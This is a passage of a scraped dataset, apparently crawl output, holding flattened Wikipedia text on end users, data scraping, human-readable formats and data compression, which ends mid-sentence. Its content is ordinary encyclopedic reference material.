221 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/End-user | In product development, an end user (sometimes end-user) a is a person who ultimately uses or is intended to ultimately use a product. 1 2 3 The end user stands in contrast to users who support or maintain the product, 4 such as sysops, system administrators, database administrators, 5 information technology (IT) experts, software professionals, and computer technicians. End users typically do not possess the technical understanding or skill of the product designers, 6 a fact easily overlooked and forgotten by designers: leading to features creating low customer satisfaction. 2 In information technology, end users are not customers in the usual sense—they are typically employees of the customer. 7 For example, if a large retail corporation buys a software package for its employees to use, even though the large retail corporation was the customer that purchased the software, the end users are the employees of the company, who will use the software at work. End users are one of the three major factors contributing to the complexity of managing information systems. The end user's position has changed from a position in the 1950s (where end users did not interact with the mainframe; computer experts programmed and ran the mainframe) to one in the 2010s where the end user collaborates with and advises the management information system and Information Technology department about his or her needs regarding the system or product. This raises new questions, such as: Who manages each resource?, What is the role of the MIS Department? and What is the optimal relationship between the end-user and the MIS Department? 8 The concept of end-user first surfaced in the late 1980s and has since then raised many debates. One challenge was the goal to give both the user more freedom, by adding advanced features and functions (for more advanced users) and adding more constraints (to prevent a neophyte user from accidentally erasing an entire company's database). 9 This phenomenon appeared as a consequence of consumerization of computer products and software. In the 1960s and 1970s, computer users were generally programming experts and computer scientists. However, in the 1980s, and especially in the mid-to-late 1990s and the early 2000s, everyday, regular people began using computer devices and software for personal and work use. IT specialists needed to cope with this trend in various ways. In the 2010s, users now want to have more control over the systems they operate, to solve their own problems, and be able to customize the systems to suit their needs. The apparent drawbacks were the risk of corruption of the systems and data the users had control of, due to their lack of knowledge on how to properly operate the computer software at an advanced level. 10 For companies to appeal to the user, it took primary care to accommodate and think of end-users in their new products, software launches, and updates. A partnership needed to be formed between the programmer-developers and the everyday end users so both parties could maximize the use of the products effectively. 11 A major example of the public's effects on end user's requirements were the public libraries. They have been affected by new technologies in many ways, ranging from the digitalization of their card catalog, the shift to e-books, e-journals, and offering online services. 
Libraries have had to undergo many changes in order to cope, 12 including training existing librarians in Web 2.0 and database skills, to hiring IT and software experts. The aim of end user documentation (e.g., manuals and guidebooks for products) is to help the user understand certain aspects of the systems and to provide all the answers in one place. 13 A lot of documentation is available for users to help them understand and properly use a certain product or service. Due to the fact that the information available is usually very vast, inconsistent or ambiguous (e.g., a user manual with hundreds of pages, including guidance on using advanced features), many users suffer from an information overload. Therefore, they become unable to take the right course of action. This needs to be kept in mind when developing products and services and the necessary documentation for them. 14 Well-written documentation is needed for a user to reference. Some key aspects of such a documentation are: 13 At times users do not refer to the documentation available to them due to various reasons, ranging from finding the manual too large or due to not understanding the jargon and acronyms it contains. In other cases, the users may find that the manual makes too many assumptions about a user having pre-existing knowledge of computers and software, and thus the directions may skip over these initial steps (from the users' point of view). Thus, frustrated user may report false problems because of their inability to understand the software or computer hardware. This in turn causes the company to focus on perceived problems instead of focusing on the actual problems of the software. 15 In the 2010s, there is a lot of emphasis on user's security and privacy. With the increasing role that computers are playing in people's lives, people are carrying laptops and smartphones with them and using them for scheduling appointments, making online purchases using credit cards and searching for information. These activities can potentially be observed by companies, governments or individuals, which can lead to breaches of privacy, identity theft, by, blackmailing and other serious concerns. As well, many businesses, ranging from small business startups to huge corporations are using computers and software to design, manufacture, market and sell their products and services, and businesses also use computers and software in their back office processes (e.g., human resources, payroll, etc.). As such, it is important for people and organizations to need know that the information and data they are storing, using, or sending over computer networks or storing on computer systems is secure. However, developers of software and hardware are faced with many challenges in developing a system that can be both user friendly, accessible 24 7 on almost any device and be truly secure. Security leaks happen, even to individuals and organizations that have security measures in place to protect their data and information (e.g., firewalls, encryption, strong passwords). The complexities of creating such a secure system come from the fact that the behaviour of humans is not always rational or predictable. Even in a very-well secured computer system, a malicious individual can telephone a worker and pretend to be a private investigator working for the software company, and ask for the individual's password, a dishonest process called phishing. 
As well, even with a well-secured system, if a worker decides to put the company's electronic files on a USB drive to take them home to work on them over the weekend (against many companies' policies), and then loses this USB drive, the company's data may be compromised. Therefore, developers need to make systems that are intuitive to the user in order to have information security and system security. 16 Another key step to end user security is informing the people and employees about the security threats and what they can do to avoid them or protect themselves and the organization. Clearly underlining, the capabilities and risks makes users more aware and informed whilst they are using the products. Some situations that could put the user at risk are: Even if the security measures in place are strong, the choices the user makes and his her behavior have a major impact on how secure their information really is. Therefore, an informed user is one who can protect and achieve the best security out of the system they use. 17 Because of the importance of end-user security and the impact it can have on organizations the UK government set out a guidance for the public sector, to help civil servants learn how to be more security aware when using government networks and computers. While this is targeted to a certain sector, this type of educational effort can be informative to any type of user. This helps developers meet security norms and end users be aware of the risks involved. 18 Reimers and Andersson have conducted a number of studies on end-user security habits and found that the same type of repeated education training in security best practices can have a marked effect on the perception of compliance with good end-user network security habits, especially concerning malware and ransomware. 19 In end-user license agreements, the end user is distinguished from the value-added reseller, who installs the software or the organization that purchases and manages the software. 20 failed verification Certain American defense-related products and information require export approval from the United States Government under the International Traffic in Arms Regulations and Export Administration Regulations. 21 In order to obtain a license to export, the exporter must specify both the end user and the end use for undertaking an end-user certificate. 22 In the UK, there exist documents that accompany licenses for products named in the end user undertaking statements. clarification needed 23 |
222 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:Web_crawlers | This category has the following 2 subcategories, out of 2 total. The following 19 pages are in this category, out of 19 total. This list may not reflect recent changes. |
223 | https://en.wikipedia.org/wiki/Data_scraping | https://id.wikipedia.org/wiki/Pengorekan_data | Pengorekan data, also known as data scraping, is an automation technique used to extract and process data from a website, database, enterprise application, or legacy system and store it in a file in a tabular or spreadsheet format; the technique is also fairly easy to use because it delivers information that can be read directly. 1 2 Data can be obtained from the web using tools that work in stages: first, a request is made to the web with a GET command to extract the data; next comes parsing, in which the scraping tool produces the specific data of interest; finally, the information obtained is shown on a display. 1 2 Data scraping comes in two different forms, web scraping and screen scraping. Web scraping is a way of extracting specific data from a website by accessing its source code, such as HTML, CSS, and JavaScript, or by using an API provided by the website's owner. Screen scraping, by contrast, is a type of data extraction that visually analyses the interfaces presented on the web, which can be viewed directly. 1 2 |
224 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Human-readable_medium | In computing, a human-readable medium or human-readable format is any encoding of data or information that can be naturally read by humans, resulting in human-readable data. It is often encoded as ASCII or Unicode text, rather than as binary data. In most contexts, the alternative to a human-readable representation is a machine-readable format or medium of data primarily designed for reading by electronic, mechanical or optical devices, or computers. For example, Universal Product Code (UPC) barcodes are very difficult to read for humans, but very effective and reliable with the proper equipment, whereas the strings of numerals that commonly accompany the label are the human-readable form of the barcode information. Since any type of data encoding can be parsed by a suitably programmed computer, the decision to use binary encoding rather than text encoding is usually made to conserve storage space. Encoding data in a binary format typically requires fewer bytes of storage and increases efficiency of access (input and output) by eliminating format parsing or conversion. With the advent of standardized, highly structured markup languages, such as Extensible Markup Language (XML), the decreasing costs of data storage, and faster and cheaper data communication networks, compromises between human-readability and machine-readability are now more common-place than they were in the past. This has led to humane markup languages and modern configuration file formats that are far easier for humans to read. In addition, these structured representations can be compressed very effectively for transmission or storage. Human-readable protocols greatly reduce the cost of debugging. 1 Various organizations have standardized the definition of human-readable and machine-readable data and how they are applied in their respective fields of application, e.g., the Universal Postal Union. 2 Often the term human-readable is also used to describe shorter names or strings, that are easier to comprehend or to remember than long, complex syntax notations, such as some Uniform Resource Locator strings. 3 Occasionally "human-readable" is used to describe ways of encoding an arbitrary integer into a long series of English words. Compared to decimal or other compact binary-to-text encoding systems, English words are easier for humans to read, remember, and type in. 4 |
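The row above contrasts human-readable text encodings with denser binary ones. One way to see the storage trade-off it describes is to serialize the same record both ways; the field layout below is invented purely for illustration.
import json
import struct

record = {"id": 42, "price": 19.99, "quantity": 7}

# Human-readable: JSON text encoded as UTF-8.
as_text = json.dumps(record).encode("utf-8")

# Machine-oriented: a fixed binary layout (little-endian int, double, short).
as_binary = struct.pack("<idh", record["id"], record["price"], record["quantity"])

print(len(as_text), "bytes as JSON text")     # around 40 bytes
print(len(as_binary), "bytes packed binary")  # 14 bytes
print(json.loads(as_text.decode("utf-8")) == record)  # the text form round-trips and stays greppable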
225 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_compression | In information theory, data compression, source coding, 1 or bit-rate reduction is the process of encoding information using fewer bits than the original representation. 2 Any particular compression is either lossy or lossless. Lossless compression reduces bits by identifying and eliminating statistical redundancy. No information is lost in lossless compression. Lossy compression reduces bits by removing unnecessary or less important information. 3 Typically, a device that performs data compression is referred to as an encoder, and one that performs the reversal of the process (decompression) as a decoder. The process of reducing the size of a data file is often referred to as data compression. In the context of data transmission, it is called source coding: encoding is done at the source of the data before it is stored or transmitted. 4 Source coding should not be confused with channel coding, for error detection and correction or line coding, the means for mapping data onto a signal. Data Compression algorithms present a space-time complexity trade-off between the bytes needed to store or transmit information, and the Computational resources needed to perform the encoding and decoding. The design of data compression schemes involves balancing the degree of compression, the amount of distortion introduced (when using lossy data compression), and the computational resources or time required to compress and decompress the data. 5 Lossless data compression algorithms usually exploit statistical redundancy to represent data without losing any information, so that the process is reversible. Lossless compression is possible because most real-world data exhibits statistical redundancy. For example, an image may have areas of color that do not change over several pixels; instead of coding "red pixel, red pixel, ... the data may be encoded as "279 red pixels". This is a basic example of run-length encoding; there are many schemes to reduce file size by eliminating redundancy. The Lempel Ziv (LZ) compression methods are among the most popular algorithms for lossless storage. 6 DEFLATE is a variation on LZ optimized for decompression speed and compression ratio, but compression can be slow. In the mid 1980s, following work by Terry Welch, the Lempel Ziv Welch (LZW) algorithm rapidly became the method of choice for most general-purpose compression systems. LZW is used in GIF images, programs such as PKZIP, and hardware devices such as modems. 7 LZ methods use a table-based compression model where table entries are substituted for repeated strings of data. For most LZ methods, this table is generated dynamically from earlier data in the input. The table itself is often Huffman encoded. Grammar-based codes like this can compress highly repetitive input extremely effectively, for instance, a biological data collection of the same or closely related species, a huge versioned document collection, internet archival, etc. The basic task of grammar-based codes is constructing a context-free grammar deriving a single string. Other practical grammar compression algorithms include Sequitur and Re-Pair. The strongest modern lossless compressors use probabilistic models, such as prediction by partial matching. The Burrows Wheeler transform can also be viewed as an indirect form of statistical modelling. 
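The "red pixel, red pixel, ... = 279 red pixels" example above is run-length encoding. A minimal sketch of that scheme follows (a generic illustration, not any particular codec's on-disk format).
from itertools import groupby

def rle_encode(data):
    """Collapse runs of identical symbols into (symbol, count) pairs."""
    return [(symbol, len(list(run))) for symbol, run in groupby(data)]

def rle_decode(pairs):
    """Expand (symbol, count) pairs back into the original sequence."""
    return [symbol for symbol, count in pairs for _ in range(count)]

pixels = ["red"] * 279 + ["blue"] * 3
encoded = rle_encode(pixels)
print(encoded)                        # [('red', 279), ('blue', 3)]
print(rle_decode(encoded) == pixels)  # True, so no information was lost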
8 In a further refinement of the direct use of probabilistic modelling, statistical estimates can be coupled to an algorithm called arithmetic coding. Arithmetic coding is a more modern coding technique that uses the mathematical calculations of a finite-state machine to produce a string of encoded bits from a series of input data symbols. It can achieve superior compression compared to other techniques such as the better-known Huffman algorithm. It uses an internal memory state to avoid the need to perform a one-to-one mapping of individual input symbols to distinct representations that use an integer number of bits, and it clears out the internal memory only after encoding the entire string of data symbols. Arithmetic coding applies especially well to adaptive data compression tasks where the statistics vary and are context-dependent, as it can be easily coupled with an adaptive model of the probability distribution of the input data. An early example of the use of arithmetic coding was in an optional (but not widely used) feature of the JPEG image coding standard. 9 It has since been applied in various other designs including H.263, H.264 MPEG 4 AVC and HEVC for video coding. 10 Archive software typically has the ability to adjust the "dictionary size", where a larger size demands more random-access memory during compression and decompression, but compresses stronger, especially on repeating patterns in files' content. 11 12 In the late 1980s, digital images became more common, and standards for lossless image compression emerged. In the early 1990s, lossy compression methods began to be widely used. 13 In these schemes, some loss of information is accepted as dropping nonessential detail can save storage space. There is a corresponding trade-off between preserving information and reducing size. Lossy data compression schemes are designed by research on how people perceive the data in question. For example, the human eye is more sensitive to subtle variations in luminance than it is to the variations in color. JPEG image compression works in part by rounding off nonessential bits of information. 14 A number of popular compression formats exploit these perceptual differences, including psychoacoustics for sound, and psychovisuals for images and video. Most forms of lossy compression are based on transform coding, especially the discrete cosine transform (DCT). It was first proposed in 1972 by Nasir Ahmed, who then developed a working algorithm with T. Natarajan and K. R. Rao in 1973, before introducing it in January 1974. 15 16 DCT is the most widely used lossy compression method, and is used in multimedia formats for images (such as JPEG and HEIF), 17 video (such as MPEG, AVC and HEVC) and audio (such as MP3, AAC and Vorbis). Lossy image compression is used in digital cameras, to increase storage capacities. Similarly, DVDs, Blu-ray and streaming video use lossy video coding formats. Lossy compression is extensively used in video. In lossy audio compression, methods of psychoacoustics are used to remove non-audible (or less audible) components of the audio signal. Compression of human speech is often performed with even more specialized techniques; speech coding is distinguished as a separate discipline from general-purpose audio compression. Speech coding is used in internet telephony, for example, audio compression is used for CD ripping and is decoded by the audio players. 8 Lossy compression can cause generation loss. 
The theoretical basis for compression is provided by information theory and, more specifically, Shannon's source coding theorem; domain-specific theories include algorithmic information theory for lossless compression and rate distortion theory for lossy compression. These areas of study were essentially created by Claude Shannon, who published fundamental papers on the topic in the late 1940s and early 1950s. Other topics associated with compression include coding theory and statistical inference. 18 There is a close connection between machine learning and compression. A system that predicts the posterior probabilities of a sequence given its entire history can be used for optimal data compression (by using arithmetic coding on the output distribution). Conversely, an optimal compressor can be used for prediction (by finding the symbol that compresses best, given the previous history). This equivalence has been used as a justification for using data compression as a benchmark for "general intelligence". 19 20 21 An alternative view can show compression algorithms implicitly map strings into implicit feature space vectors, and compression-based similarity measures compute similarity within these feature spaces. For each compressor C(.) we define an associated vector space , such that C(.) maps an input string x, corresponding to the vector norm x . An exhaustive examination of the feature spaces underlying all compression algorithms is precluded by space; instead, feature vectors chooses to examine three representative lossless compression methods, LZW, LZ77, and PPM. 22 According to AIXI theory, a connection more directly explained in Hutter Prize, the best possible compression of x is the smallest possible software that generates x. For example, in that model, a zip file's compressed size includes both the zip file and the unzipping software, since you can not unzip it without both, but there may be an even smaller combined form. Examples of AI-powered audio video compression software include NVIDIA Maxine, AIVC. 23 Examples of software that can perform AI-powered image compression include OpenCV, TensorFlow, MATLAB's Image Processing Toolbox (IPT) and High-Fidelity Generative Image Compression. 24 In unsupervised machine learning, k-means clustering can be utilized to compress data by grouping similar data points into clusters. This technique simplifies handling extensive datasets that lack predefined labels and finds widespread use in fields such as image compression. 25 Data compression aims to reduce the size of data files, enhancing storage efficiency and speeding up data transmission. K-means clustering, an unsupervised machine learning algorithm, is employed to partition a dataset into a specified number of clusters, k, each represented by the centroid of its points. This process condenses extensive datasets into a more compact set of representative points. Particularly beneficial in image and signal processing, k-means clustering aids in data reduction by replacing groups of data points with their centroids, thereby preserving the core information of the original data while significantly decreasing the required storage space. 26 Large language models (LLMs) are also capable of lossless data compression, as demonstrated by DeepMind's research with the Chinchilla 70B model. Developed by DeepMind, Chinchilla 70B effectively compressed data, outperforming conventional methods such as Portable Network Graphics (PNG) for images and Free Lossless Audio Codec (FLAC) for audio. 
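The k-means idea mentioned above, replacing groups of data points with their cluster centroids, is easiest to see as colour quantization. The sketch below assumes NumPy and scikit-learn are available (neither is installed at the top of this notebook) and uses random pixels in place of a real image.
import numpy as np
from sklearn.cluster import KMeans

# Stand-in image: 10,000 RGB pixels with values in [0, 255].
rng = np.random.default_rng(0)
pixels = rng.integers(0, 256, size=(10_000, 3)).astype(float)

# Quantize to a 16-colour palette: each pixel is replaced by its centroid.
kmeans = KMeans(n_clusters=16, n_init=10, random_state=0).fit(pixels)
palette = kmeans.cluster_centers_   # 16 x 3 centroid colours
indices = kmeans.labels_            # one small integer per pixel

# Storage falls from 3 bytes per pixel to 4 bits per pixel plus the palette,
# at the cost of a small reconstruction error.
reconstructed = palette[indices]
print(reconstructed.shape, float(np.abs(reconstructed - pixels).mean()))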
It achieved compression of image and audio data to 43.4% and 16.4% of their original sizes, respectively. 27 Data compression can be viewed as a special case of data differencing. 28 29 Data differencing consists of producing a difference given a source and a target, with patching reproducing the target given a source and a difference. Since there is no separate source and target in data compression, one can consider data compression as data differencing with empty source data, the compressed file corresponding to a difference from nothing. This is the same as considering absolute entropy (corresponding to data compression) as a special case of relative entropy (corresponding to data differencing) with no initial data. The term differential compression is used to emphasize the data differencing connection. Entropy coding originated in the 1940s with the introduction of Shannon Fano coding, 30 the basis for Huffman coding which was developed in 1950. 31 Transform coding dates back to the late 1960s, with the introduction of fast Fourier transform (FFT) coding in 1968 and the Hadamard transform in 1969. 32 An important image compression technique is the discrete cosine transform (DCT), a technique developed in the early 1970s. 15 DCT is the basis for JPEG, a lossy compression format which was introduced by the Joint Photographic Experts Group (JPEG) in 1992. 33 JPEG greatly reduces the amount of data required to represent an image at the cost of a relatively small reduction in image quality and has become the most widely used image file format. 34 35 Its highly efficient DCT-based compression algorithm was largely responsible for the wide proliferation of digital images and digital photos. 36 Lempel Ziv Welch (LZW) is a lossless compression algorithm developed in 1984. It is used in the GIF format, introduced in 1987. 37 DEFLATE, a lossless compression algorithm specified in 1996, is used in the Portable Network Graphics (PNG) format. 38 Wavelet compression, the use of wavelets in image compression, began after the development of DCT coding. 39 The JPEG 2000 standard was introduced in 2000. 40 In contrast to the DCT algorithm used by the original JPEG format, JPEG 2000 instead uses discrete wavelet transform (DWT) algorithms. 41 42 43 JPEG 2000 technology, which includes the Motion JPEG 2000 extension, was selected as the video coding standard for digital cinema in 2004. 44 Audio data compression, not to be confused with dynamic range compression, has the potential to reduce the transmission bandwidth and storage requirements of audio data. Audio compression formats compression algorithms are implemented in software as audio codecs. In both lossy and lossless compression, information redundancy is reduced, using methods such as coding, quantization, DCT and linear prediction to reduce the amount of information used to represent the uncompressed data. Lossy audio compression algorithms provide higher compression and are used in numerous audio applications including Vorbis and MP3. These algorithms almost all rely on psychoacoustics to eliminate or reduce fidelity of less audible sounds, thereby reducing the space required to store or transmit them. 2 45 The acceptable trade-off between loss of audio quality and transmission or storage size depends upon the application. 
For example, one 640 MB compact disc (CD) holds approximately one hour of uncompressed high fidelity music, less than 2 hours of music compressed losslessly, or 7 hours of music compressed in the MP3 format at a medium bit rate. A digital sound recorder can typically store around 200 hours of clearly intelligible speech in 640 MB. 46 Lossless audio compression produces a representation of digital data that can be decoded to an exact digital duplicate of the original. Compression ratios are around 50 60% of the original size, 47 which is similar to those for generic lossless data compression. Lossless codecs use curve fitting or linear prediction as a basis for estimating the signal. Parameters describing the estimation and the difference between the estimation and the actual signal are coded separately. 48 A number of lossless audio compression formats exist. See list of lossless codecs for a listing. Some formats are associated with a distinct system, such as Direct Stream Transfer, used in Super Audio CD and Meridian Lossless Packing, used in DVD-Audio, Dolby TrueHD, Blu-ray and HD DVD. Some audio file formats feature a combination of a lossy format and a lossless correction; this allows stripping the correction to easily obtain a lossy file. Such formats include MPEG 4 SLS (Scalable to Lossless), WavPack, and OptimFROG DualStream. When audio files are to be processed, either by further compression or for editing, it is desirable to work from an unchanged original (uncompressed or losslessly compressed). Processing of a lossily compressed file for some purpose usually produces a final result inferior to the creation of the same compressed file from an uncompressed original. In addition to sound editing or mixing, lossless audio compression is often used for archival storage, or as master copies. Lossy audio compression is used in a wide range of applications. In addition to standalone audio-only applications of file playback in MP3 players or computers, digitally compressed audio streams are used in most video DVDs, digital television, streaming media on the Internet, satellite and cable radio, and increasingly in terrestrial radio broadcasts. Lossy compression typically achieves far greater compression than lossless compression, by discarding less-critical data based on psychoacoustic optimizations. 49 Psychoacoustics recognizes that not all data in an audio stream can be perceived by the human auditory system. Most lossy compression reduces redundancy by first identifying perceptually irrelevant sounds, that is, sounds that are very hard to hear. Typical examples include high frequencies or sounds that occur at the same time as louder sounds. Those irrelevant sounds are coded with decreased accuracy or not at all. Due to the nature of lossy algorithms, audio quality suffers a digital generation loss when a file is decompressed and recompressed. This makes lossy compression unsuitable for storing the intermediate results in professional audio engineering applications, such as sound editing and multitrack recording. However, lossy formats such as MP3 are very popular with end-users as the file size is reduced to 5 20% of the original size and a megabyte can store about a minute's worth of music at adequate quality. Several proprietary lossy compression algorithms have been developed that provide higher quality audio performance by using a combination of lossless and lossy algorithms with adaptive bit rates and lower compression ratios. Examples include aptX, LDAC, LHDC, MQA and SCL6. 
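The figures quoted above can be sanity-checked with a little arithmetic. The sketch below assumes CD audio at 16 bits x 44.1 kHz x 2 channels (about 1,411 kbit/s), lossless compression to roughly 55% of that rate, and a "medium" MP3 bit rate of about 200 kbit/s; these rates are illustrative assumptions, not values taken from the text's sources.

# Rough check of the "hours per 640 MB" figures, under assumed bit rates
DISC_BITS = 640 * 1024 * 1024 * 8            # 640 MB disc capacity, in bits

def hours_at(bitrate_kbps):
    # Hours of audio that fit on the disc at a constant bit rate
    return DISC_BITS / (bitrate_kbps * 1000) / 3600

cd_kbps = 44100 * 16 * 2 / 1000              # uncompressed CD audio, ~1411 kbit/s
print("uncompressed CD audio:", round(hours_at(cd_kbps), 1), "hours")       # about 1 hour
print("lossless at ~55%:", round(hours_at(cd_kbps * 0.55), 1), "hours")     # just under 2 hours
print("MP3 at ~200 kbit/s:", round(hours_at(200), 1), "hours")              # roughly 7 hours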
To determine what information in an audio signal is perceptually irrelevant, most lossy compression algorithms use transforms such as the modified discrete cosine transform (MDCT) to convert time-domain sampled waveforms into a transform domain, typically the frequency domain. Once transformed, component frequencies can be prioritized according to how audible they are. Audibility of spectral components is assessed using the absolute threshold of hearing and the principles of simultaneous masking (the phenomenon wherein a signal is masked by another signal separated by frequency) and, in some cases, temporal masking (where a signal is masked by another signal separated by time). Equal-loudness contours may also be used to weigh the perceptual importance of components. Models of the human ear-brain combination incorporating such effects are often called psychoacoustic models. 50 Other types of lossy compressors, such as the linear predictive coding (LPC) used with speech, are source-based coders. LPC uses a model of the human vocal tract to analyze speech sounds and infer the parameters used by the model to produce them moment to moment. These changing parameters are transmitted or stored and used to drive another model in the decoder which reproduces the sound. Lossy formats are often used for the distribution of streaming audio or interactive communication (such as in cell phone networks). In such applications, the data must be decompressed as the data flows, rather than after the entire data stream has been transmitted. Not all audio codecs can be used for streaming applications. 49 Latency is introduced by the methods used to encode and decode the data. Some codecs will analyze a longer segment, called a frame, of the data to optimize efficiency, and then code it in a manner that requires a larger segment of data at one time to decode. The inherent latency of the coding algorithm can be critical; for example, when there is a two-way transmission of data, such as with a telephone conversation, significant delays may seriously degrade the perceived quality. In contrast to the speed of compression, which is proportional to the number of operations required by the algorithm, here latency refers to the number of samples that must be analyzed before a block of audio is processed. In the minimum case, latency is zero samples (e.g., if the coder/decoder simply reduces the number of bits used to quantize the signal). Time-domain algorithms such as LPC also often have low latencies, hence their popularity in speech coding for telephony. In algorithms such as MP3, however, a large number of samples have to be analyzed to implement a psychoacoustic model in the frequency domain, and latency is on the order of 23 ms. Speech encoding is an important category of audio data compression. The perceptual models used to estimate what aspects of speech a human ear can hear are generally somewhat different from those used for music. The range of frequencies needed to convey the sounds of a human voice is normally far narrower than that needed for music, and the sound is normally less complex. As a result, speech can be encoded at high quality using a relatively low bit rate. This is accomplished, in general, by some combination of two approaches. The earliest algorithms used in speech encoding (and audio data compression in general) were the A-law algorithm and the μ-law algorithm. Early audio research was conducted at Bell Labs. There, in 1950, C.
Chapin Cutler filed the patent on differential pulse-code modulation (DPCM). 51 In 1973, Adaptive DPCM (ADPCM) was introduced by P. Cummiskey, Nikil S. Jayant and James L. Flanagan. 52 53 Perceptual coding was first used for speech coding compression, with linear predictive coding (LPC). 54 Initial concepts for LPC date back to the work of Fumitada Itakura (Nagoya University) and Shuzo Saito (Nippon Telegraph and Telephone) in 1966. 55 During the 1970s, Bishnu S. Atal and Manfred R. Schroeder at Bell Labs developed a form of LPC called adaptive predictive coding (APC), a perceptual coding algorithm that exploited the masking properties of the human ear, followed in the early 1980s with the code-excited linear prediction (CELP) algorithm which achieved a significant compression ratio for its time. 54 Perceptual coding is used by modern audio compression formats such as MP3 54 and AAC. Discrete cosine transform (DCT), developed by Nasir Ahmed, T. Natarajan and K. R. Rao in 1974, 16 provided the basis for the modified discrete cosine transform (MDCT) used by modern audio compression formats such as MP3, 56 Dolby Digital, 57 58 and AAC. 59 MDCT was proposed by J. P. Princen, A. W. Johnson and A. B. Bradley in 1987, 60 following earlier work by Princen and Bradley in 1986. 61 The world's first commercial broadcast automation audio compression system was developed by Oscar Bonello, an engineering professor at the University of Buenos Aires. 62 In 1983, using the psychoacoustic principle of the masking of critical bands first published in 1967, 63 he started developing a practical application based on the recently developed IBM PC computer, and the broadcast automation system was launched in 1987 under the name Audicom. 64 35 years later, almost all the radio stations in the world were using this technology manufactured by a number of companies because the inventor refuses to get invention patents for his work. He prefers declaring it of Public Domain publishing it 65 A literature compendium for a large variety of audio coding systems was published in the IEEE's Journal on Selected Areas in Communications (JSAC), in February 1988. While there were some papers from before that time, this collection documented an entire variety of finished, working audio coders, nearly all of them using perceptual techniques and some kind of frequency analysis and back-end noiseless coding. 66 Uncompressed video requires a very high data rate. Although lossless video compression codecs perform at a compression factor of 5 to 12, a typical H.264 lossy compression video has a compression factor between 20 and 200. 67 The two key video compression techniques used in video coding standards are the DCT and motion compensation (MC). Most video coding standards, such as the H.26x and MPEG formats, typically use motion-compensated DCT video coding (block motion compensation). 68 69 Most video codecs are used alongside audio compression techniques to store the separate but complementary data streams as one combined package using so-called container formats. 70 Video data may be represented as a series of still image frames. Such data usually contains abundant amounts of spatial and temporal redundancy. Video compression algorithms attempt to reduce redundancy and store information more compactly. Most video compression formats and codecs exploit both spatial and temporal redundancy (e.g. through difference coding with motion compensation). Similarities can be encoded by only storing differences between e.g. 
temporally adjacent frames (inter-frame coding) or spatially adjacent pixels (intra-frame coding). Inter-frame compression (a temporal delta encoding) (re)uses data from one or more earlier or later frames in a sequence to describe the current frame. Intra-frame coding, on the other hand, uses only data from within the current frame, effectively being still-image compression. 50 The intra-frame video coding formats used in camcorders and video editing employ simpler compression that uses only intra-frame prediction. This simplifies video editing software, as it prevents a situation in which a compressed frame refers to data that the editor has deleted. Usually, video compression additionally employs lossy compression techniques like quantization that reduce aspects of the source data that are (more or less) irrelevant to the human visual perception by exploiting perceptual features of human vision. For example, small differences in color are more difficult to perceive than are changes in brightness. Compression algorithms can average a color across these similar areas in a manner similar to those used in JPEG image compression. 9 As in all lossy compression, there is a trade-off between video quality and bit rate, cost of processing the compression and decompression, and system requirements. Highly compressed video may present visible or distracting artifacts. Other methods other than the prevalent DCT-based transform formats, such as fractal compression, matching pursuit and the use of a discrete wavelet transform (DWT), have been the subject of some research, but are typically not used in practical products. Wavelet compression is used in still-image coders and video coders without motion compensation. Interest in fractal compression seems to be waning, due to recent theoretical analysis showing a comparative lack of effectiveness of such methods. 50 In inter-frame coding, individual frames of a video sequence are compared from one frame to the next, and the video compression codec records the differences to the reference frame. If the frame contains areas where nothing has moved, the system can simply issue a short command that copies that part of the previous frame into the next one. If sections of the frame move in a simple manner, the compressor can emit a (slightly longer) command that tells the decompressor to shift, rotate, lighten, or darken the copy. This longer command still remains much shorter than data generated by intra-frame compression. Usually, the encoder will also transmit a residue signal which describes the remaining more subtle differences to the reference imagery. Using entropy coding, these residue signals have a more compact representation than the full signal. In areas of video with more motion, the compression must encode more data to keep up with the larger number of pixels that are changing. Commonly during explosions, flames, flocks of animals, and in some panning shots, the high-frequency detail leads to quality decreases or to increases in the variable bitrate. Many commonly used video compression methods (e.g., those in standards approved by the ITU-T or ISO) share the same basic architecture that dates back to H.261 which was standardized in 1988 by the ITU-T. They mostly rely on the DCT, applied to rectangular blocks of neighboring pixels, and temporal prediction using motion vectors, as well as nowadays also an in-loop filtering step. 
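As a toy illustration of the inter-frame idea described above, the sketch below builds two nearly identical synthetic "frames" with NumPy and compares the compressed size of the new frame coded on its own against the compressed size of its difference from the previous frame, with zlib standing in for the entropy coder. It is only meant to show why residuals compress well, not to model a real video codec.

import zlib
import numpy as np

rng = np.random.default_rng(0)
frame0 = rng.integers(0, 250, size=(120, 160), dtype=np.uint8)  # synthetic "previous" frame
frame1 = frame0.copy()
frame1[40:60, 50:90] += 3                                       # only a small region changes

intra_size = len(zlib.compress(frame1.tobytes()))               # code the new frame by itself
residual = frame1.astype(np.int16) - frame0.astype(np.int16)    # inter-frame difference
inter_size = len(zlib.compress(residual.astype(np.int8).tobytes()))
print("intra-coded bytes:", intra_size)
print("inter-coded bytes:", inter_size)   # far smaller: the residual is almost all zeros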
In the prediction stage, various deduplication and difference-coding techniques are applied that help decorrelate data and describe new data based on already transmitted data. Then rectangular blocks of remaining pixel data are transformed to the frequency domain. In the main lossy processing stage, frequency domain data gets quantized in order to reduce information that is irrelevant to human visual perception. In the last stage statistical redundancy gets largely eliminated by an entropy coder which often applies some form of arithmetic coding. In an additional in-loop filtering stage various filters can be applied to the reconstructed image signal. By computing these filters also inside the encoding loop they can help compression because they can be applied to reference material before it gets used in the prediction process and they can be guided using the original signal. The most popular example are deblocking filters that blur out blocking artifacts from quantization discontinuities at transform block boundaries. In 1967, A.H. Robinson and C. Cherry proposed a run-length encoding bandwidth compression scheme for the transmission of analog television signals. 71 The DCT, which is fundamental to modern video compression, 72 was introduced by Nasir Ahmed, T. Natarajan and K. R. Rao in 1974. 16 73 H.261, which debuted in 1988, commercially introduced the prevalent basic architecture of video compression technology. 74 It was the first video coding format based on DCT compression. 72 H.261 was developed by a number of companies, including Hitachi, PictureTel, NTT, BT and Toshiba. 75 The most popular video coding standards used for codecs have been the MPEG standards. MPEG 1 was developed by the Motion Picture Experts Group (MPEG) in 1991, and it was designed to compress VHS-quality video. It was succeeded in 1994 by MPEG 2 H.262, 74 which was developed by a number of companies, primarily Sony, Thomson and Mitsubishi Electric. 76 MPEG 2 became the standard video format for DVD and SD digital television. 74 In 1999, it was followed by MPEG 4 H.263. 74 It was also developed by a number of companies, primarily Mitsubishi Electric, 